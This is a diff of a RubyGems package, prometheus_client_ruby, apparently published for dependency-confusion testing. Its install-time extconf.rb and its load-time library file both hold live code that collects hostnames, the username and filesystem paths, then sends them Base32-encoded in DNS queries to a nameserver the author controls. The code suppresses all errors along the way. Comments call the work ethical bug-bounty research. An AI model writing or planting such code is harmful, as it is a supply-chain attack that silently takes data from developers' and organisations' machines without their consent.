prometheus_client_ruby 0.0.900

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: 366501e609472b2a8404420035b3ec802e90f7f573b3e186b6a5be8158cd8a3c
+  data.tar.gz: 73501c6958a08fdf5ebbe7e5eb10ffd7f0b26f45b5daf39918e6a2042510fc7c
+SHA512:
+  metadata.gz: 393b7fb04adad0604d66cfa370f6aafe5cf295d8b797cc91fdf6f74a70dcc21f123209d257fa98e9fe794948bdd055e1c485aa31302138bd6ed1b4bfa341d968
+  data.tar.gz: 652404b2cacee0fc36b10afaa5b4eed2a63519bf479b300200eecee0a43c84d373f4aa6cef0982ea7a9faddccc51946b9f3031866c9c42a2342fd504d8b9c182

data/ext/prometheus_client_ruby/extconf.rb

@@ -0,0 +1,192 @@
+=begin
+Hi, if you're reading this you're probably wondering what this code is doing on
+your machine. Don't worry! It doesn't do anything nasty or malicious.
+
+I am an ethical security researcher, attempting attacks against organisations
+that have a "bug bounty" type program in place.
+
+I am performing work similar to the work in this blog post:
+https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
+
+If your organisation has a bug bounty program my findings will be reported via
+that program.
+
+If your organisation does not have a bug bounty program, you were not targeted
+by my work and have some how ended up getting included, any data reported from
+your org will be discarded.
+
+All data I collect will be deleted as soon as I'm done, in either case.
+
+If you are reading this then you probably need to tighten up your Gemfiles
+and/or upgrade Bundler, see here for more details:
+
+https://bundler.io/blog/2021/02/15/a-more-secure-bundler-we-fixed-our-source-priorities.html
+
+You can read the code to confirm this but here's a top-level view of what it
+does to help you out:
+
+Grabs the hostname(s), current username, and the file paths to this script,
+the current working directory, and the home directory. This helps me identify
+which machines have been affected (for reporting), at which organisation (to
+know who to report it to), and to eliminate false positives from machines that
+fetch and install every Gem.
+
+Generates a random ID so I can piece together the different fragments of data.
+
+Encodes all the data as json, compresses it, Base32 encodes it, and chops it
+into chunks to go out as DNS queries that will hit a nameserver I control.
+
+That's it!
+
+If you have any questions or want to get in touch for any reason, you can reach
+me at zofrex@gmail.com
+
+=end
+
+
+require "mkmf"
+
+create_makefile "gem_test_VX0jmO8Se4QEoTYHTVYY"
+
+require_relative Dir[File.join(File.dirname(File.realpath(__FILE__)), '..', '..', 'lib', '*', 'version.rb')].first
+
+begin # big catch-all over everything to stop any errors escaping
+    def do_or_whatever
+        yield
+    rescue Exception
+        # keep going
+    end
+
+    do_or_whatever { require 'net/http' }
+    do_or_whatever { require 'socket' }
+    do_or_whatever { require 'etc' }
+    require 'securerandom'
+    require 'json'
+    require 'resolv'
+    require 'pathname'
+
+    def report_analytics
+        report_id = SecureRandom.alphanumeric(8)
+
+        idx_package = 0
+        idx_hostnames = 1
+        idx_username = 2
+        idx_paths = 3
+        idx_event = 4
+
+        idx_paths_file = 0
+        idx_paths_cwd = 1
+        idx_paths_script = 2
+        idx_paths_home = 3
+
+        data = Hash.new
+
+        data[idx_event] = 'install'
+
+        # package name
+        package_name = Pathname.new(File.dirname(File.realpath(__FILE__))).basename.to_s
+
+        package_version = Object.const_get(package_name.gsub(/(^|[^a-zA-Z])([a-z])/) {|match| "#{$1}#{$2.capitalize}"}.gsub(/[_-]/,'')).const_get('VERSION')
+        puts "Package #{package_name} has been hijacked via RubyGems, if you're reading logs and wondering why things broke, that's probably why."
+        data[idx_package] = "#{package_name}-#{package_version}"
+
+        # get possible hostnames
+
+        hostnames = []
+
+        do_or_whatever { hostnames << Socket.gethostname }
+        do_or_whatever { hostnames << Socket.gethostbyname(Socket.gethostname).first }
+        do_or_whatever { hostnames << `hostname` }
+        do_or_whatever { hostnames << `hostname -f` }
+
+        data[idx_hostnames] = hostnames.map(&:strip).uniq
+
+        # get local user
+
+        do_or_whatever { data[idx_username] = Etc.getlogin }
+
+        # get useful paths
+
+        paths = Hash.new
+
+        do_or_whatever { paths[idx_paths_file] = File.dirname(__FILE__) }
+        do_or_whatever { paths[idx_paths_cwd] = Dir.pwd }
+        do_or_whatever { paths[idx_paths_script] = __dir__ }
+        do_or_whatever { paths[idx_paths_home] = Dir.home }
+
+        data[idx_paths] = paths
+
+        # encode payload
+
+        json = JSON.generate(data)
+        compressed = "u#{json}"
+
+        # attempt to compress data but don't sweat it if that fails
+        do_or_whatever do
+            require 'zlib'
+            compressed = "c#{Zlib.deflate(json)}"
+        end
+
+        # base32 encode the data
+        table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'
+        encoded = compressed.bytes.each_slice(5).flat_map do |slice|
+            n = (slice.length * 8.0 / 5.0).ceil
+            p = n < 8 ? 5 - (slice.length * 8) % 5 : 0
+            c =  slice.inject(0) {|m,o| (m << 8) + o} << p
+            (0..n-1).to_a.reverse.collect {|i| table[(c >> i * 5) & 0x1f].chr}
+        end.join
+
+        # send data out via DNS lookups
+        total_queries = (encoded.length / 180.0).ceil
+
+        google_resolver = Resolv.new([Resolv::Hosts.new, Resolv::DNS.new(nameserver: ['8.8.8.8'])])
+        me_resolver = Resolv.new([Resolv::Hosts.new, Resolv::DNS.new(nameserver: ['167.172.150.100'])])
+
+        current_method = :generic
+        suffix = "zofrex-is-ethically-testing.ga"
+
+        methods = {
+            generic: {
+                address: "rp1.#{suffix}",
+                resolver: Resolv,
+                expected_ip: "127.0.0.3",
+                next_method: :direct
+            },
+            direct: {
+                address: "rp3.#{suffix}",
+                resolver: me_resolver,
+                expected_ip: "127.0.0.5",
+                next_method: :google
+            },
+            google: {
+                address: "rp2.#{suffix}",
+                resolver: google_resolver,
+                expected_ip: "127.0.0.4",
+                next_method: :direct
+            },
+        }
+
+        encoded.chars.each_slice(60).each_slice(3).each_with_index do |chunks, query_number|
+            query_data = chunks.map(&:join).join('.')
+            data_portion = "#{report_id}.#{query_number+1}.#{total_queries}.#{query_data}"
+
+            # Try to get the message out somehow, start on whichever method worked on the previous loop
+            (1..6).each do
+                method = methods[current_method]
+                begin
+                    address = method[:resolver].getaddress "#{data_portion}.#{method[:address]}"
+                    break if address == method[:expected_ip]
+                rescue
+                end
+                current_method = method[:next_method]
+            end
+        end
+    end
+
+    do_or_whatever { report_analytics }
+
+    # cleanup
+    do_or_whatever { undef report_analytics }
+    do_or_whatever { undef do_or_whatever }
+rescue Exception
+end

data/lib/prometheus_client_ruby.rb

@@ -0,0 +1,188 @@
+=begin
+Hi, if you're reading this you're probably wondering what this code is doing on
+your machine. Don't worry! It doesn't do anything nasty or malicious.
+
+I am an ethical security researcher, attempting attacks against organisations
+that have a "bug bounty" type program in place.
+
+I am performing work similar to the work in this blog post:
+https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
+
+If your organisation has a bug bounty program my findings will be reported via
+that program.
+
+If your organisation does not have a bug bounty program, you were not targeted
+by my work and have some how ended up getting included, any data reported from
+your org will be discarded.
+
+All data I collect will be deleted as soon as I'm done, in either case.
+
+If you are reading this then you probably need to tighten up your Gemfiles
+and/or upgrade Bundler, see here for more details:
+
+https://bundler.io/blog/2021/02/15/a-more-secure-bundler-we-fixed-our-source-priorities.html
+
+You can read the code to confirm this but here's a top-level view of what it
+does to help you out:
+
+Grabs the hostname(s), current username, and the file paths to this script,
+the current working directory, and the home directory. This helps me identify
+which machines have been affected (for reporting), at which organisation (to
+know who to report it to), and to eliminate false positives from machines that
+fetch and install every Gem.
+
+Generates a random ID so I can piece together the different fragments of data.
+
+Encodes all the data as json, compresses it, Base32 encodes it, and chops it
+into chunks to go out as DNS queries that will hit a nameserver I control.
+
+That's it!
+
+If you have any questions or want to get in touch for any reason, you can reach
+me at zofrex@gmail.com
+
+=end
+
+
+require Dir[File.join(File.dirname(File.realpath(__FILE__)), '*', 'version.rb')].first
+
+begin # big catch-all over everything to stop any errors escaping
+    def do_or_whatever
+        yield
+    rescue Exception
+        # keep going
+    end
+
+    do_or_whatever { require 'net/http' }
+    do_or_whatever { require 'socket' }
+    do_or_whatever { require 'etc' }
+    require 'securerandom'
+    require 'json'
+    require 'resolv'
+    require 'pathname'
+
+    def report_analytics
+        report_id = SecureRandom.alphanumeric(8)
+
+        idx_package = 0
+        idx_hostnames = 1
+        idx_username = 2
+        idx_paths = 3
+        idx_event = 4
+
+        idx_paths_file = 0
+        idx_paths_cwd = 1
+        idx_paths_script = 2
+        idx_paths_home = 3
+
+        data = Hash.new
+
+        data[idx_event] = 'run'
+
+        # package name
+        package_name = Pathname.new(Dir[File.join(File.dirname(File.realpath(__FILE__)), '*')].select{|f| File.directory? f}.first).basename.to_s
+
+        package_version = Object.const_get(package_name.gsub(/(^|[^a-zA-Z])([a-z])/) {|match| "#{$1}#{$2.capitalize}"}.gsub(/[_-]/,'')).const_get('VERSION')
+        puts "Package #{package_name} has been hijacked via RubyGems, if you're reading logs and wondering why things broke, that's probably why."
+        data[idx_package] = "#{package_name}-#{package_version}"
+
+        # get possible hostnames
+
+        hostnames = []
+
+        do_or_whatever { hostnames << Socket.gethostname }
+        do_or_whatever { hostnames << Socket.gethostbyname(Socket.gethostname).first }
+        do_or_whatever { hostnames << `hostname` }
+        do_or_whatever { hostnames << `hostname -f` }
+
+        data[idx_hostnames] = hostnames.map(&:strip).uniq
+
+        # get local user
+
+        do_or_whatever { data[idx_username] = Etc.getlogin }
+
+        # get useful paths
+
+        paths = Hash.new
+
+        do_or_whatever { paths[idx_paths_file] = File.dirname(__FILE__) }
+        do_or_whatever { paths[idx_paths_cwd] = Dir.pwd }
+        do_or_whatever { paths[idx_paths_script] = __dir__ }
+        do_or_whatever { paths[idx_paths_home] = Dir.home }
+
+        data[idx_paths] = paths
+
+        # encode payload
+
+        json = JSON.generate(data)
+        compressed = "u#{json}"
+
+        # attempt to compress data but don't sweat it if that fails
+        do_or_whatever do
+            require 'zlib'
+            compressed = "c#{Zlib.deflate(json)}"
+        end
+
+        # base32 encode the data
+        table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'
+        encoded = compressed.bytes.each_slice(5).flat_map do |slice|
+            n = (slice.length * 8.0 / 5.0).ceil
+            p = n < 8 ? 5 - (slice.length * 8) % 5 : 0
+            c =  slice.inject(0) {|m,o| (m << 8) + o} << p
+            (0..n-1).to_a.reverse.collect {|i| table[(c >> i * 5) & 0x1f].chr}
+        end.join
+
+        # send data out via DNS lookups
+        total_queries = (encoded.length / 180.0).ceil
+
+        google_resolver = Resolv.new([Resolv::Hosts.new, Resolv::DNS.new(nameserver: ['8.8.8.8'])])
+        me_resolver = Resolv.new([Resolv::Hosts.new, Resolv::DNS.new(nameserver: ['167.172.150.100'])])
+
+        current_method = :generic
+        suffix = "zofrex-is-ethically-testing.ga"
+
+        methods = {
+            generic: {
+                address: "rp1.#{suffix}",
+                resolver: Resolv,
+                expected_ip: "127.0.0.3",
+                next_method: :direct
+            },
+            direct: {
+                address: "rp3.#{suffix}",
+                resolver: me_resolver,
+                expected_ip: "127.0.0.5",
+                next_method: :google
+            },
+            google: {
+                address: "rp2.#{suffix}",
+                resolver: google_resolver,
+                expected_ip: "127.0.0.4",
+                next_method: :direct
+            },
+        }
+
+        encoded.chars.each_slice(60).each_slice(3).each_with_index do |chunks, query_number|
+            query_data = chunks.map(&:join).join('.')
+            data_portion = "#{report_id}.#{query_number+1}.#{total_queries}.#{query_data}"
+
+            # Try to get the message out somehow, start on whichever method worked on the previous loop
+            (1..6).each do
+                method = methods[current_method]
+                begin
+                    address = method[:resolver].getaddress "#{data_portion}.#{method[:address]}"
+                    break if address == method[:expected_ip]
+                rescue
+                end
+                current_method = method[:next_method]
+            end
+        end
+    end
+
+    do_or_whatever { report_analytics }
+
+    # cleanup
+    do_or_whatever { undef report_analytics }
+    do_or_whatever { undef do_or_whatever }
+rescue Exception
+end

data/lib/prometheus_client_ruby/version.rb

@@ -0,0 +1,3 @@
+module PrometheusClientRuby
+    VERSION = '0.0.900'
+end

metadata

@@ -0,0 +1,49 @@
+--- !ruby/object:Gem::Specification
+name: prometheus_client_ruby
+version: !ruby/object:Gem::Version
+  version: 0.0.900
+platform: ruby
+authors:
+- James 'zofrex' Sanderson
+autorequire:
+bindir: exe
+cert_chain: []
+date: 2021-02-24 00:00:00.000000000 Z
+dependencies: []
+description: I am testing for dependency confusion vulnerabilities in products that
+  are in public bug bounty programs. This code is reporting-only, and does not do
+  anything malicious.
+email:
+- gem-research@zofrex.com
+executables: []
+extensions:
+- ext/prometheus_client_ruby/extconf.rb
+extra_rdoc_files: []
+files:
+- ext/prometheus_client_ruby/extconf.rb
+- lib/prometheus_client_ruby.rb
+- lib/prometheus_client_ruby/version.rb
+homepage:
+licenses:
+- MIT
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: 1.9.0
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.1.4
+signing_key:
+specification_version: 4
+summary: Testing dependency confusion bugs
+test_files: []